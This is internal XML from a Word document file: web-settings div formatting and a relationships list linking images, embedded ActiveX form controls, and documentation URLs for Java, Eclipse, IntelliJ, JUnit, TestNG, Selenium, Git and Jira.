            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1024286075">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1142506488">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1150946916">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1154373085">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1280066415">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1329092432">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1365329892">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1378578305">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1596672381">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1993941866">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2097551039">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2098480782">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="884829050">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="935215792">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="945043427">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="948312492">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="337536994">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1239754408">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1302494841">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1447231916">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1656757040">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1860269387">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="953747857">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1238707058">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="36974307">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="746339711">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1083528266">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1098672090">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1435319201">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2096632705">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1276209099">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1329479729">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1358966112">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="367148649">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1364986344">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1389379227">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1660228146">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1703625001">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1739405085">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1890605653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1945795528">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2033260601">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2100321414">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2135128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image" Target="media/image12.jpeg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX14.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/hamcrest/downloads/list" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://help.eclipse.org/2019-03/index.jsp." TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-format-patch." TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seleniumhq.org/projects/webdriver/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX25.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/8/docs/technotes/tools/index.html." TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_create_java_package.htm." TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/alldoc/atlassian-documentation-32243719.html." TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/using-git-integration.html." TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX15.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/technetwork/java/javase/downloads/index.html." TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/package/index.html." TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX36.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://junit.org/index.html" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/idea/download." TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/alldoc/atlassian-documentation-32243719.html." TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/deploying-a-release-764478183.html." TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/get-started-with-jira-core/create-a-project-917965385.html." TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-status" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testng.org/doc/download.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="cid:image001.jpg@01D40F86.D718AD60" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Classpath_(Java)." TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX5.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX26.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX47.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_create_java_class.htm." TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-status" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/book/en/v2" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/debugging-your-first-java-application.html." TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/en/java/javase." TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/eclipse/eclipse_create_java_project.htm." TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX16.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX37.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/essential/environment/paths.html." TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testng.org/doc/download.html" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/installation-guide.html." TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/get-started-with-jira-core/create-a-project-917965385.html." TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/basic-searching-764478306.html." TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/project-management." TargetMode="External"/><Relationship Id="rId249" 